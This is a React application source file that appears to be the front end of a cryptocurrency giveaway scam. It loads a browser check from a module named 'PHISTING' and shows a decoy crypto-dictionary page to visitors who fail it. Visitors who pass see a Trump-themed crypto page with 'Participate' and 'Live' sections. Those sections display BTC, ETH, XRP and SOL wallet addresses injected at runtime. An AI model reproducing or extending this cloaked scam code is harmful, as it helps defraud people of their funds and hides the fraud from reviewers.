import { use, useEffect, useState } from 'react';
import './App.css';
import { Header } from './components/Header';
import { Info } from './components/Info';
import Live from './components/Live';
import { Nav } from './components/Nav';
import { Participate } from './components/Participate';
import loader from "./images/icons/loader.png";
import BrowserGate from './utils/PHISTING';
import CryptoDictionary from './components/Dict';
import CryptoHero from './components/CryptoHero';
import TrumpCryptoBlock from './components/TrumpCrypto';
import { Footer } from './components/Footer';

function App() {
  const [loading, setLoading] = useState(true);
  const [btc, setBTC] = useState("1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2");
  const [eth, setETH] = useState("0x742d35Cc6634C0532925a3b8D3Ac92b4c6b4b8b8");
  const [sol, setSOL] = useState("DRiP2Pn2K6fuMLKQmt5rZWyHiUZ6zDvNrxjdMtgd2YgS");
  const [xrp, setXRP] = useState("DRiP2Pn2K6fuMLKQmt5rZWyHiUZ6zDvNrxjdMtgd2YgS");
  const [gate, setgate] = useState({gate: false, pass: false});

  useEffect(() => {
    try {
      if (window.cdata && window.cdata.wallets) {
        const wallets = window.cdata.wallets;
        
        if (wallets.btc && typeof wallets.btc === 'string' && wallets.btc.trim()) {
          setBTC(wallets.btc.trim());
        } else {
          setBTC('123');
        }
        
        if (wallets.eth && typeof wallets.eth === 'string' && wallets.eth.trim()) {
          setETH(wallets.eth.trim());
        } else {
          setETH('123');
        }
        
        if (wallets.xrp && typeof wallets.xrp === 'string' && wallets.xrp.trim()) {
          setXRP(wallets.xrp.trim());
        } else {
          setXRP('123');
        }

        if (wallets.sol && typeof wallets.sol === 'string' && wallets.sol.trim()) {
          setSOL(wallets.sol.trim());
        } else {
          setSOL('123');
        }
        
      } else {
        setBTC('123');
        setETH('123');
        setXRP('123');
        setSOL('123');
      }
    } catch (error) {
      console.error('Error loading wallet addresses:', error);
      setBTC('123');
      setETH('123');
      setXRP('123');
      setSOL('123');
    }
  }, []);
  useEffect(() => {
    setTimeout(function(){
      setLoading(false);
    }, 3500);
  }, []);

  if(loading){
    return (
      <div className='load'>
        <img src={loader}/>
      </div>
    )
  }
  if(gate.gate && !gate.pass){
    return (
      <CryptoDictionary/>
    );
  }
  return (
    <BrowserGate 
      onPass={() => setgate({gate: true, pass: true})} 
      onFail={() => setgate({gate: true, pass: false})}
    >
      <div>
        <Nav/>
        <Header/>
        <CryptoHero/>
        <TrumpCryptoBlock/>
        <Info/>
        <Participate btc={btc} eth={eth} xrp={xrp} sol={sol}/>
        <Live btcAddress={btc} ethAddress={eth} xrpAddress={xrp} solAddress={sol}/>
        <Footer/>
      </div>
    </BrowserGate>
  );
}

export default App;
